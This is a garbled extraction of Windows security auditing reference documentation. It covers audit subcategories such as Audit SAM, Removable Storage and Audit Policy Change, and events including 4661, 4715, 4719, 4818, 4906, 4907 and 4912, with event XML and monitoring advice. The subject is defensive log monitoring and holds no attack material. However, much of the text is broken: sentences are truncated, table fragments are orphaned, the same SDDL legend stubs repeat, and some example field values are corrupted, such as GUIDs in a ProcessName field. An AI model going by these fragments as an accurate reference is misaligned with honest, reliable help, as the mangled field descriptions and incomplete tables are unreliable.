If Object Name has specific values (Object Value Name) and you need to monitor modifications of these
values, monitor for all 4657 events.
5039(-): A registry key was virtualized.
Applies to
Windows 10
Windows Server 2016
This event should be generated when registry key was virtualized using LUAFV.
This event occurs very rarely during standard LUAFV registry key virtualization.
Subcategory: Audit Registry
Event Schema:
A registry key was virtualized.
Subject:
Security ID:%1%
Account Name:%2
Account Domain:%3
Logon ID:%4
Object:
Key Name:%5
Virtual Key Name:%6
Process ID:%7
Process Name%8

Event Versions: 0.

Applies to
Windows 10
Windows Server 2016
Event Description:
SACL.

Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
the following:
Object:
Process:
Permissions Change:
Example:
in the table below:

Windows 2000


operators

administrators

controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.

rights

"KX" KEY EXECUTE
object_guid: N/A

document.
Applies to
Windows 10
Windows Server 2016
Audit Removable Storage allows you to audit user attempts to access file system objects on a removable
storage device. A security audit event is generated for all objects and all types of access requested, with no
dependency on object’s SACL.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes Yes Yes Yes This subcategory

Controller will help identify
when and which
files or folders
were accessed or
modified on
removable
devices.
It is often useful
to track actions
with removable
storage devices
and the files or
folders on them,
because
malicious
software very
often uses
removable
devices as a
method to get
into the system.
At the same
time, you will be
able to track
which files were
written or
executed from a
removable
storage device.
You can track,
for example,
actions with files
or folders on
USB flash drives
or sticks that
were inserted
into domain
controllers or
high value
servers, which is
typically not
allowed.
We recommend
Failure auditing
to track failed
access attempts.
Member Server Yes Yes Yes Yes
Workstation Yes Yes Yes Yes
Events List:
Audit SAM
Applies to
Windows 10
Windows Server 2016
Audit SAM, which enables you to audit events that are generated by attempts to access Security Account
Manager (SAM ) objects.
The Security Account Manager (SAM ) is a database that is present on computers running Windows operating
systems that stores user accounts and security descriptors for users on the local computer.
SAM objects include the following:
SAM_ALIAS: A local group
SAM_GROUP: A group that is not a local group
SAM_USER: A user account
SAM_DOMAIN: A domain
SAM_SERVER: A computer account
If you configure this policy setting, an audit event is generated when a SAM object is accessed. Success audits
record successful attempts, and failure audits record unsuccessful attempts.
Only a SACL for SAM_SERVER can be modified.
Changes to user and group objects are tracked by the Account Management audit category. However, user
accounts with enough privileges could potentially alter the files in which the account and password information
is stored in the system, bypassing any Account Management events.
Event volume: High on domain controllers.
For information about reducing the number of events generated in this subcategory, see KB841001.
STRONGER STRONGER
Domain - - - - There is no
Controller recommendation
for this
subcategory in
this document,
unless you know
exactly what you
need to monitor
at Security
Account
Manager level.
STRONGER STRONGER
Member Server - - - - There is no

recommendation
for this
subcategory in
this document,
unless you know
exactly what you
need to monitor
at Security
Account
Manager level.
Workstation - - - - There is no
recommendation
for this
subcategory in
this document,
unless you know
exactly what you
need to monitor
at Security
Account
Manager level.
Events List:
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Directory Service
Access and Audit SAM
Event Description:
This event indicates that a handle was
requested for either an Active Directory object
or a Security Account Manager (SAM ) object.
If access was declined, then Failure event is
generated.
This event generates only if Success auditing
is enabled for the Audit Handle Manipulation
subcategory.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectServer">Security Account Manager</Data>
<Data Name="ObjectType">SAM\_DOMAIN</Data>
<Data Name="ObjectName">DC=contoso,DC=local</Data>
<Data Name="HandleId">0xdd64d36870</Data>
<Data Name="AccessMask">0x2d</Data>
<Data Name="PrivilegeList">Ā</Data>
<Data Name="Properties">-</Data>
<Data Name="ProcessId">0x9000a000d002d</Data>
<Data Name="ProcessName">{bf967a90-0de6-11d0-a285-00aa003049e2} %%5400 {ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501}
</Data>
</EventData>
</Event>
Required Server Roles: For an Active Directory object, the domain controller role is required. For a SAM object,
there is no required role.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested a handle to an object. Event Viewer automatically
the event.
the following:
Object:
Object Server [Type = UnicodeString]: has “Security Account Manager” value for this event.
Object Type [Type = UnicodeString]: the type or class of the object that was accessed. The following list
contains possible values for this field:
SAM_ALIAS - a local group.
SAM_GROUP - a group that is not a local group.
SAM_USER - a user account.
SAM_DOMAIN - a domain. For Active Directory events, this is the typical value.
SAM_SERVER - a computer account.
Object Name [Type = UnicodeString]: the name of an object for which access was requested. Depends on
Object Type. This event can have the following format:
SAM_ALIAS – SID of the group.
SAM_GROUP - SID of the group.
SAM_USER - SID of the account.
SAM_DOMAIN – distinguished name of the accessed object.
SAM_SERVER - distinguished name of the accessed object.
attributes:
• CN - commonName
this event with other events that might contain the same Handle ID, for example, “4662: An operation was
performed on an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested the handle. Process ID
with other events that might contain the same the Transaction ID, such as “4660(S ): An object was
deleted.”
0000-000000000000}”.
These access rights depend on Object Type. See “Table 13. File access codes.” for more information about
file access rights. For information about SAM object access right use https://technet.microsoft.com/ or
other informational resources.
Access Mask [Type = HexInt32]: hexadecimal mask for the operation that was requested or performed.
See “Table 13. File access codes.” for more information about file access rights. For information about SAM
object access right use https://technet.microsoft.com/ or other informational resources.

of a process.

operations.
is held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE

the user may not have permissions on
the traversed directory. This privilege
does not allow the user to list the
contents of a directory, only to traverse
directories.




creation APIs.

another account.
components.

a process.
interface.
users.
driver.

memory.
system performance by decreasing the
amount of available random access
memory (RAM).
computer account.
controllers.

defragmentation.

system processes.

SeRemoteShutdownPrivilege Force shutdown from a remote system Required to shut down a system using
a network request.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.

information.

processes.
clock.



a terminal device.
Properties [Type = UnicodeString]: depends on Object Type. This field can be empty or contain the list of
the object properties that were accessed. See more detailed information in “4661: A handle to an object
was requested” from Audit SAM subcategory.
Object Types.
You can get almost the same information from “4662: An operation was performed on an object.” There are no
additional recommendations for this event in this document.
Applies to
Windows 10
Windows Server 2016
Audit Central Access Policy Staging allows you to audit access requests where a permission granted or denied by a
proposed policy differs from the current central access policy on an object.
If you configure this policy setting, an audit event is generated each time a user accesses an object and the
permission granted by the current central access policy on the object differs from that granted by the proposed
policy. The resulting audit event is generated as follows:
Success audits, when configured, record access attempts when the current central access policy grants
access, but the proposed policy denies access.
Failure audits, when configured, record access attempts when:
The current central access policy does not grant access, but the proposed policy grants access.
A principal requests the maximum access rights they are allowed and the access rights granted by
the current central access policy are different than the access rights granted by the proposed policy.
STRONGER STRONGER
Domain IF No IF No IF - Enable this

Controller subcategory if
you need to test
or troubleshoot
Dynamic Access
Control Proposed
Central Access
Policies.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server IF No IF No IF - Enable this

subcategory if
you need to test
or troubleshoot
Dynamic Access
Control Proposed
Central Access
Policies.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Workstation IF No IF No IF - Enable this

subcategory if
you need to test
or troubleshoot
Dynamic Access
Control Proposed
Central Access
Policies.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4818(S ): Proposed Central Access Policy does not grant the same access permissions as the current Central
Access Policy.
4818(S): Proposed Central Access Policy does not
grant the same access permissions as the current
Central Access Policy.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Central Policy Staging

Event Description:
This event generates when Dynamic Access Control Proposed Central Access Policy is enabled and access was not
granted by Proposed Central Access Policy.
Event XML:
- <System>
<Level>0</Level>
<Task>12813</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectUserName">Auditor</Data>
<Data Name="SubjectLogonId">0x1e5f21</Data>
<Data Name="ObjectName">C:\\Finance Documents\\desktop.ini</Data>
<Data Name="HandleId">0xc64</Data>
<Data Name="ProcessName" />
<Data Name="AccessReason">%%1538: %%1801 D:(A;ID;0x1200a9;;;BU) %%1541: %%1801 D:(A;ID;0x1200a9;;;BU) %%4416:
%%1801 D:(A;ID;0x1200a9;;;BU) %%4419: %%1801 D:(A;ID;0x1200a9;;;BU) %%4423: %%1801 D:(A;ID;0x1200a9;;;BU)
</Data>
<Data Name="StagingReason">%%1538: %%1814Finance Documents Rule %%1541: %%1814Finance Documents Rule %%4416:
%%1814Finance Documents Rule %%4419: %%1814Finance Documents Rule %%4423: %%1814Finance Documents Rule</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an access request. Event Viewer automatically tries to
event.
Account Name [Type = UnicodeString]: the name of the account that made an access request.
the following:
Object:
Object Name [Type = UnicodeString]: full path and name of the file or folder for which access was
requested.
Current Central Access Policy results:
Access Reasons [Type = UnicodeString]: the list of access check results for Current Access Policy. The format of
the result is:
REQUESTED_ACCESS: RESULT ACE_WHICH_PROVIDED_OR_DENIED_ACCESS.

The possible REQUESTED_ACCESS values are listed in the table below.
Table of file access codes

ACCESS HEXADECIMAL VALUE DESCRIPTION
ReadData (or ListDirectory) 0x1 ReadData - For a file object, the right
to read the corresponding file data. For
directory.
WriteData (or AddFile) 0x2 WriteData - For a file object, the right
to write data to the file. For a directory
AppendData (or AddSubdirectory or 0x4 AppendData - For a file object, the

CreatePipeInstance) right to append data to the file. (For
ReadEA 0x8 The right to read extended file

attributes.
WriteEA 0x10 The right to write extended file

attributes.
Execute/Traverse 0x20 Execute - For a native code file, the

right to execute the file. This access
are assigned the
DeleteChild 0x40 For a directory, the right to delete a

directory and all the files it contains,
ReadAttributes 0x80 The right to read file attributes.
WriteAttributes 0x100 The right to write file attributes.
DELETE 0x10000 The right to delete the object.
READ_CONTROL 0x20000 The right to read the information in the

object's security descriptor, not
WRITE_DAC 0x40000 The right to modify the discretionary

access control list (DACL) in the object's
WRITE_OWNER 0x80000 The right to change the owner in the

object's security descriptor
SYNCHRONIZE 0x100000 The right to use the object for

ACCESS_SYS_SEC 0x1000000 The ACCESS_SYS_SEC access right

controls the ability to get or set the
RESULT:
Granted by
Denied by
Granted by ACE on parent folder
Not granted due to missing – after this sentence you will typically see missing user rights, for
example SeSecurityPrivilege.
Unknown or unchecked
ACE_WHICH_PROVIDED_OR_DENIED_ACCESS:
Ownership – if access was granted because of ownership of an object.
User Right name, for example SeSecurityPrivilege.
The Security Descriptor Definition Language (SDDL ) value for the Access Control Entry (ACE ) that
granted or denied access.
Proposed Central Access Policy results that differ from the current Central Access Policy results:
Access Reasons [Type = UnicodeString]: the list of access check results for Proposed Central Access Policy.
Here you will see only denied requests. The format of the result is:
REQUESTED_ACCESS: NOT Granted by RULE_NAME Rule.

The possible REQUESTED_ACCESS values are listed in the table below:
ReadData (or ListDirectory) 0x1 ReadData - For a file object, the right
to read the corresponding file data. For
directory.
WriteData (or AddFile) 0x2 WriteData - For a file object, the right
to write data to the file. For a directory
AppendData (or AddSubdirectory or 0x4 AppendData - For a file object, the

CreatePipeInstance) right to append data to the file. (For
ReadEA 0x8 The right to read extended file

attributes.
WriteEA 0x10 The right to write extended file

attributes.
Execute/Traverse 0x20 Execute - For a native code file, the

right to execute the file. This access
are assigned the
DeleteChild 0x40 For a directory, the right to delete a

directory and all the files it contains,
ReadAttributes 0x80 The right to read file attributes.
WriteAttributes 0x100 The right to write file attributes.
DELETE 0x10000 The right to delete the object.
READ_CONTROL 0x20000 The right to read the information in the

object's security descriptor, not
WRITE_DAC 0x40000 The right to modify the discretionary

access control list (DACL) in the object's
WRITE_OWNER 0x80000 The right to change the owner in the

object's security descriptor
SYNCHRONIZE 0x100000 The right to use the object for

ACCESS_SYS_SEC 0x1000000 The ACCESS_SYS_SEC access right

controls the ability to get or set the
RULE_NAME: the name of Central Access Rule which denied the access.

For 4818(S ): Proposed Central Access Policy does not grant the same access permissions as the current Central
Access Policy.
This event typically used for troubleshooting and testing of Proposed Central Access Policies for Dynamic
Access Control.
Applies to
Windows 10
Windows Server 2016
Audit Audit Policy Change determines whether the operating system generates audit events when changes are
made to audit policy.
Event volume: Low.
STRONGER STRONGER
Domain Yes No Yes No Almost all events

Controller in this
subcategory
have security
relevance and
should be
monitored.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Member Server Yes No Yes No Almost all events

in this
subcategory
have security
relevance and
should be
monitored.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Workstation Yes No Yes No Almost all events

in this
subcategory
have security
relevance and
should be
monitored.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Changes to audit policy that are audited include:

Changing permissions and audit settings on the audit policy object (by using “auditpol /set /sd”
command).
Changing the system audit policy.
Registering and unregistering security event sources.
Changing per-user audit settings.
Changing the value of CrashOnAuditFail.
Changing audit settings on an object (for example, modifying the system access control list (SACL ) for a
file or registry key).
Note SACL change auditing is performed when a SACL for an object has changed and the Policy Change
category is configured. Discretionary access control list (DACL ) and owner change auditing are performed
when Object Access auditing is configured and the object's SACL is set for auditing of the DACL or owner
change.
Changing anything in the Special Groups list.

The following events will be enabled with Success auditing in this subcategory:
4902(S ): The Per-user audit policy table was created.
4907(S ): Auditing settings on object were changed.
4904(S ): An attempt was made to register a security event source.
4905(S ): An attempt was made to unregister a security event source.
All other events in this subcategory will be logged regardless of the "Audit Policy Change" setting.
Events List:
4715(S ): The audit policy (SACL ) on an object was changed.
4719(S ): System audit policy was changed.
4902(S ): The Per-user audit policy table was created.
4906(S ): The CrashOnAuditFail value has changed.
4908(S ): Special Groups Logon table modified.
4912(S ): Per User Audit Policy was changed.
4904(S ): An attempt was made to register a security event source.
4905(S ): An attempt was made to unregister a security event source.
Applies to
Windows 10
Windows Server 2016
Event Description:
SACL.

Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
the following:
Object:
Process:
Permissions Change:
Example:
in the table below:

Windows 2000


operators

administrators

controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.

rights

"KX" KEY EXECUTE
object_guid: N/A

document.
4715(S): The audit policy (SACL) on an object was
changed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change

Event Description:
This event generates every time local audit policy security descriptor changes.
This event is always logged regardless of the "Audit Policy Change" sub-category setting.
Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x11ae30</Data>
<Data Name="OldSd">D:(A;;DCSWRPDTRC;;;BA)(D;;DCSWRPDTRC;;;SY)S:NO\_ACCESS\_CONTROL</Data>
<Data Name="NewSd">D:(A;;DCSWRPDTRC;;;BA)(A;;DCSWRPDTRC;;;SY)S:NO\_ACCESS\_CONTROL</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change local audit policy security descriptor
(SACL )” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID
Account Name [Type = UnicodeString]: the name of the account that requested the “change local audit
policy security descriptor (SACL )” operation.
the following:
Audit Policy Change:
(SDDL ) value for the audit policy.
New Security Descriptor [Type = UnicodeString]: new Security Descriptor Definition Language (SDDL )
value for the audit policy.
Example:
in the table below:

Windows 2000

operators

administrators


controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.

rights
"KX" KEY EXECUTE
object_guid: N/A

For 4715(S ): The audit policy (SACL ) on an object was changed.
Monitor for all events of this type, especially on high value assets or computers, because any change of the local
audit policy security descriptor should be planned. If this action was not planned, investigate the reason for the
change.
4719(S): System audit policy was changed.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates when the computer's
audit policy changes.
This event is always logged regardless of
the "Audit Policy Change" sub-category
setting.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="CategoryId">%%8274</Data>
<Data Name="SubcategoryId">%%12807</Data>
<Data Name="SubcategoryGuid">{0CCE9223-69AE-11D9-BED3-505054503030}</Data>
<Data Name="AuditPolicyChanges">%%8448, %%8450</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to local audit policy. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that made a change to local audit policy.
the following:
Audit Policy Change:
Category: the name of auditing Category which subcategory was changed. Possible values:
Account Logon
Account Management
Detailed Tracking
DS Access
Logon/Logoff
Object Access
Policy Change
Privilege Use
System
Subcategory: the name of auditing Subcategory which was changed. Possible values:
CREDENTIAL VALIDATION PROCESS TERMINATION NETWORK POLICY SERVER
Kerberos Authentication Service RPC Events Other Logon/Logoff Events
Kerberos Service Ticket Operations Detailed Directory Service Replication Special Logon
Other Logon/Logoff Events Directory Service Access Application Generated
Application Group Management Directory Service Changes Certification Services
Computer Account Management Directory Service Replication Detailed File Share
Distribution Group Management Account Lockout File Share
Other Account Management Events IPsec Extended Mode File System
Security Group Management IPsec Main Mode Filtering Platform Connection
User Account Management IPsec Quick Mode Filtering Platform Packet Drop
DPAPI Activity Logoff Handle Manipulation
Process Creation Logon Kernel Object
Other Object Access Events Filtering Platform Policy Change IPsec Driver
CREDENTIAL VALIDATION PROCESS TERMINATION NETWORK POLICY SERVER
Registry MPSSVC Rule-Level Policy Change Other System Events
SAM Other Policy Change Events Security State Change
Policy Change Non-Sensitive Privilege Use Security System Extension
Authentication Policy Change Sensitive Privilege Use System Integrity
Authorization Policy Change Other Privilege Use Events Plug and Play Events
Group Membership
Subcategory GUID: the unique subcategory GUID. To see Subcategory GUIDs you can use this command:
auditpol /list /subcategory:* /v.
Changes: changes which were made for “Subcategory”. Possible values:

Success removed
Failure removed
Success added
Failure added
It can be also a combination of any of the items above, separated by coma.

For 4719(S ): System audit policy was changed.
Monitor for all events of this type, especially on high value assets or computers, because any change in local
audit policy should be planned. If this action was not planned, investigate the reason for the change.
4817(S): Auditing settings on object were changed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit
Policy Change
Event Description:
when the Global
Object Access Auditing
policy is changed on a
computer.
Separate events will be
generated for
“Registry” and “File
system” policy
changes.
Note For
recommendations,
see Security
Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectServer">LSA</Data>
<Data Name="ObjectType">Global SACL</Data>
<Data Name="ObjectName">Key</Data>
<Data Name="OldSd" />
<Data Name="NewSd">S:(AU;SA;RC;;;S-1-5-21-3457937927-2839227994-823803824-1104)</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to Global Object Access Auditing policy. Event
Account Name [Type = UnicodeString]: the name of the account that made a change to Global Object
Access Auditing policy.
the following:
Object:
Object Server [Type = UnicodeString]: has “LSA” value for this event.
Object Type [Type = UnicodeString]: The type of an object to which this event applies. Always “Global
SACL” for this event.
Profile Desktop KeyedEvent Central Access Policies
Key WaitablePort Callback Global SACL
Job Port FilterConnectionPort
ALPC Port Semaphore Adapter
**Object Name: **
Key – if “Registry” Global Object Access Auditing policy was changed.
File – if “File system” Global Object Access Auditing policy was changed.
Auditing Settings:
(SDDL ) value for the Global Object Access Auditing policy. Empty if Global Object Access Auditing policy
SACL was not set.
(SDDL ) value for the Global Object Access Auditing policy.
Example:
in the table below:

Windows 2000

operators

administrators

controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.

rights

"KX" KEY EXECUTE
object_guid: N/A

For 4817(S ): Auditing settings on object were changed.
If you use Global Object Access Auditing policies, then this event should be always monitored, especially on
high value assets or computers. If this change was not planned, investigate the reason for the change.
If you don’t use Global Object Access Auditing policies, then this event should be always monitored because
it indicates use of Global Object Access Auditing policies outside of your standard procedures.
4902(S): The Per-user audit policy table was created.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates during system startup if
Per-user audit policy is defined on the
computer.

Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="PuaCount">1</Data>
<Data Name="PuaPolicyId">0x703e</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Number of Elements [Type = UInt32]: number of users for which Per-user policies were defined (number of
unique users). You can get the list of users for which Per-user policies are defined using “auditpol /list /user”
command:
Policy ID [Type = HexInt64]: unique per-User Audit Policy hexadecimal identifier.

For 4902(S ): The Per-user audit policy table was created.
If you don’t expect to see any per-User Audit Policies enabled on specific computers (Computer), monitor
for these events.
If you don’t use per-User Audit Policies in your network, monitor for these events.
Typically this is an informational event and has little to no security relevance.
4906(S): The CrashOnAuditFail value has changed.
Applies to
Windows 10
Windows Server 2016
Event Description:
CrashOnAuditFail audit flag value was
modified.
This event is always logged regardless of the
"Audit Policy Change" sub-category setting.
More information about CrashOnAuditFail
flag can be found here.

Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="CrashOnAuditFailValue">1</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
New Value of CrashOnAuditFail [Type = UInt32]: contains new value of CrashOnAuditFail flag. Possible
values are:
0 - The feature is off. The system does not halt, even when it cannot record events in the Security Log.
1 - The feature is on. The system halts when it cannot record an event in the Security Log.
2 - The feature is on and has been triggered. The system halted because it could not record an auditable
event in the Security Log. Only members of the Administrators group can log on.

For 4906(S ): The CrashOnAuditFail value has changed.
Any changes of CrashOnAuditFail audit flag that are reported by this event must be monitored, and an alert
should be triggered. If this change was not planned, investigate the reason for the change.
4907(S): Auditing settings on object were changed.
Applies to
Windows 10
Windows Server 2016

Event Description:
This event generates when the SACL of an object (for example, a registry key or file) was changed.
This event doesn't generate for Active Directory objects.
Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x138eb0</Data>
<Data Name="ObjectType">Key</Data>
<Data Name="ObjectName">\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\EventLog\\Internet
Explorer</Data>
<Data Name="OldSd">S:AI</Data>
<Data Name="NewSd">S:ARAI(AU;CISA;KA;;;S-1-5-21-3457937927-2839227994-823803824-1104)</Data>
<Data Name="ProcessName">C:\\Windows\\regedit.exe</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to object’s auditing settings. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made a change to object’s auditing
settings.
the following:
Object:
Profile Desktop KeyedEvent SC_MANAGER OBJECT
Key WaitablePort Callback
Job Port FilterConnectionPort
ALPC Port Semaphore Adapter
Object Name [Type = UnicodeString]: full path and name of the object for which the SACL was modified.
Depends on Object Type. Here are some examples:
The format for Object Type = “Key” is: \REGISTRY\HIVE\PATH where:
HIVE:
HKEY_LOCAL_MACHINE = \REGISTRY\MACHINE
HKEY_CURRENT_USER = \REGISTRY\USER\[USER_SID ], where [USER_SID ] is the
SID of current user.
HKEY_CLASSES_ROOT = \REGISTRY\MACHINE\SOFTWARE\Classes
HKEY_USERS = \REGISTRY\USER
HKEY_CURRENT_CONFIG =
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\Current
PATH – path to the registry key.
The format for Object Type = “File” is: full path and name of the file or folder for which SACL was
modified.
correlate this event with other events that might contain the same Handle ID, for example, “4656: A handle
to an object was requested.” Event for registry keys or with Handle ID field in “4656(S, F ): A handle to an
object was requested.” Event for file system objects. This parameter might not be captured in the event, and
in that case appears as “0x0”.
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the object’s SACL was
Auditing Settings:
Example:
in the table below:

Windows 2000

operators

administrators

controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.

rights

"KX" KEY EXECUTE
object_guid: N/A

For 4907(S ): Auditing settings on object were changed.
If you need to monitor events related to specific Windows object types (“Object Type”), for example File or
Key, monitor this event for the corresponding “Object Type.”
If you need to monitor all SACL changes for specific files, folders, registry keys, or other object types,
monitor for “Object Name” field value which has specific object name.
If you have critical file or registry objects and you need to monitor all modifications (especially changes in
SACL ), monitor for specific “Object\Object Name”.
If you have high-value computers for which you need to monitor all changes for all or specific file or registry
objects, monitor for all 4907 events on these computers.
4908(S): Special Groups Logon table modified.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time Special
Groups logon table was modified.
This event also generates during system
startup.
This event is always logged regardless of the
"Audit Policy Change" sub-category setting.
More information about Special Groups
auditing can be found here:
http://blogs.technet.com/b/askds/archive/2008/03/11/special-groups-auditing-via-group-policy-preferences.aspx
https://support.microsoft.com/kb/947223
Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SidList">%{S-1-5-21-3457937927-2839227994-823803824-512}</Data>
</EventData>
</Event>
Event Versions: 0.
Field Descriptions:
Special Groups [Type = UnicodeString]: contains current list of SIDs (groups or accounts) which are members of
Special Groups. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\Audit\SpecialGroups” registry value contains

current list of SIDs which are included in Special Groups:

For 4908(S ): Special Groups Logon table modified.
If you use the Special Groups feature, then this event should be always monitored, especially on high value
assets or computers. If this change was not planned, investigate the reason for the change.
If you don’t use the Special Groups feature, then this event should be always monitored because it indicates
use of the Special Groups feature outside of your standard procedures.
4912(S): Per User Audit Policy was changed.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time Per User
Audit Policy was changed.
This event is always logged regardless of
the "Audit Policy Change" sub-category
setting.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x11ae30</Data>
<Data Name="CategoryId">%%8276</Data>
<Data Name="SubcategoryId">%%13312</Data>
<Data Name="SubcategoryGuid">{0CCE922B-69AE-11D9-BED3-505054503030}</Data>
<Data Name="AuditPolicyChanges">%%8452</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to per-user audit policy. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made a change to per-user audit
policy.
the following:
Policy For Account:
Security ID [Type = SID ]: SID of account for which the Per User Audit Policy was changed. Event Viewer
Policy Change Details:
Category [Type = UnicodeString]: the name of auditing category which subcategory state was changed.
Account Logon
Account Management
Detailed Tracking
DS Access
Logon/Logoff
Object Access
Policy Change
Privilege Use
System
Subcategory [Type = UnicodeString]: the name of auditing subcategory which state was changed. Possible
values:
AUDIT CREDENTIAL VALIDATION AUDIT PROCESS TERMINATION AUDIT OTHER LOGON/LOGOFF EVENTS
Audit Kerberos Authentication Service Audit RPC Events Audit Special Logon
Audit Kerberos Service Ticket Audit Detailed Directory Service Audit Application Generated
Operations Replication
Audit Other Logon/Logoff Events Audit Directory Service Access Audit Certification Services
Audit Application Group Management Audit Directory Service Changes Audit Detailed File Share
Audit Computer Account Management Audit Directory Service Replication Audit File Share
Audit Distribution Group Management Audit Account Lockout Audit File System
AUDIT CREDENTIAL VALIDATION AUDIT PROCESS TERMINATION AUDIT OTHER LOGON/LOGOFF EVENTS
Audit Other Account Management Audit IPsec Extended Mode Audit Filtering Platform Connection
Events
Audit Security Group Management Audit IPsec Main Mode Audit Filtering Platform Packet Drop
Audit User Account Management Audit IPsec Quick Mode Audit Handle Manipulation
Audit DPAPI Activity Audit Logoff Audit Kernel Object
Audit Process Creation Audit Logon Audit IPsec Driver
Audit Other Object Access Events Audit Filtering Platform Policy Change Audit Other System Events
Audit Registry Audit MPSSVC Rule-Level Policy Audit Security State Change
Change
Audit SAM Audit Other Policy Change Events Audit Security System Extension
Audit Policy Change Audit Non-Sensitive Privilege Use Audit System Integrity
Audit Authentication Policy Change Audit Sensitive Privilege Use Audit PNP Activity
Audit Authorization Policy Change Audit Other Privilege Use Events
Group Membership Audit Network Policy Server
